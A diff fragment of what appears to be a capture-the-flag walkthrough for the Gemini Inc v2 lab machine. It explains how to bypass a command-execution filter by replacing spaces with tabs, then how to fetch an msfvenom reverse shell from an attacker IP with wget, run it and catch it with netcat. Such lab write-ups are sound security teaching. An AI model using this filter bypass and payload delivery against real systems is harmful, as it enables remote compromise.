limbernie/limbernie.github.io/_posts/2018-06-03-gemini-inc-v2-walkthrough.md

 ### Execute Command

 The most common shell in Linux distributions is `bash` and it uses whitespace as the separator between the command, option(s), and argument(s).
-For example, in this command execution —  `wget -O /tmp/rev 192.168.10.128/rev`, the space character is the separator between the command `wget`, the option `-O`, and the arguments `/tmp/rev` and `192.168.10.128/rev`.
+For example, in this command execution— `wget -O /tmp/rev 192.168.10.128/rev`, the space character is the separator between the command `wget`, the option `-O`, and the arguments `/tmp/rev` and `192.168.10.128/rev`.
 In fact, `bash` defines space, tab, and the newline character as whitespace.
 In other words, we can substitute the space character (`\x20`) with the tab character (`\x09`) in the previous example and it would still execute.

 With this in mind, let's generate a reverse shell with `msfvenom` and name it as `rev`; host it with Python's `SimpleHTTPServer`, and execute `wget -O /tmp/rev 192.168.10.128/rev` in the **Execute Command** page to transfer it over, replacing the space character with the tab character.
 We then execute `/tmp/rev` in the **Execute Command** page to launch the reverse shell.
 We also need to get the `netcat` listener ready to catch the reverse shell.